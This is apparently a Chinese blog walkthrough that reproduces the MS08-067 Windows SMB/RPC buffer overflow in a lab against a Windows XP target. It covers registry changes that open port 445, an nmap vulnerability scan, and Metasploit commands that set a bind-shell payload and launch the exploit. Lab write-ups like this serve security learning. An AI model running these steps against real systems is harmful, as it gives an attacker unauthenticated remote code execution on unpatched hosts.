MS08-067缓冲区溢出漏洞复现

1、漏洞名称

MS08-067

Windows Server 服务RPC请求缓冲区溢出漏洞

2、漏洞简介

MS08-067漏洞全称是“Windows Server 服务RPC请求缓冲区溢出漏洞”,攻击者利用受害者主机默认开放的SMB服务端口445,发送特殊RPC(Remote Procedure Call,远程过程调用)请求,造成栈缓冲区内存错误,从而被利用实施远程代码执行。

当用户在受影响的系统上受到RPC请求时,该漏洞会允许远程代码执行,攻击者可以在未经身份验证情况下利用此漏洞运行任意代码。同时,该漏洞可以用于蠕虫攻击。它影响了某些旧版本的windows系统,包括Windows2000、WindowsXP、windows Server2003

3、实验准备

攻击机:kali 192.168.37.3

靶机:Windows xp sp3 192.168.37.2

关闭xp的防火

XP开放445端口

445端口的打开方法:开始-运行输入regedit.修改注册表,添加一个键值 Hive: HKEY_LOCAL_MACHINE Key: System\CurrentControlSet\Services\NetBT\Parameters Name: SMBDeviceEnabled Type: REG_DWORD Value: 1 重新启动运行--CMD--输入netstat -an 可以看到开放的端口

二者相互能ping通

└─# nmap -n -p 445 --script smb-vuln-ms08-067 192.168.37.2 --open

  • -n: 禁用DNS解析,只显示IP地址。
  • -p 445: 扫描目标主机的端口445(SMB协议常用端口)。
  • --script smb-vuln-ms08-067: 使用Nmap的脚本“smb-vuln-ms08-067”来检测是否存在MS08-067漏洞。
  • 192.168.37.2: 目标主机的IP地址。
  • --open: 只显示开放的端口。

利用kali的msf工具

终端输入msfconsole打开此工具

search ms08-067

搜索漏洞利用模块

set payload generic/shell_bind_tcp

set rhost 192.168.37.2

set rport 445

set lhost 192.168.37.3

set target 0

target 设置为系统默认是自动定位,如果需要精确定位,可以show targets 查看所有,然后进行选择。

尝试run
拿下 

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值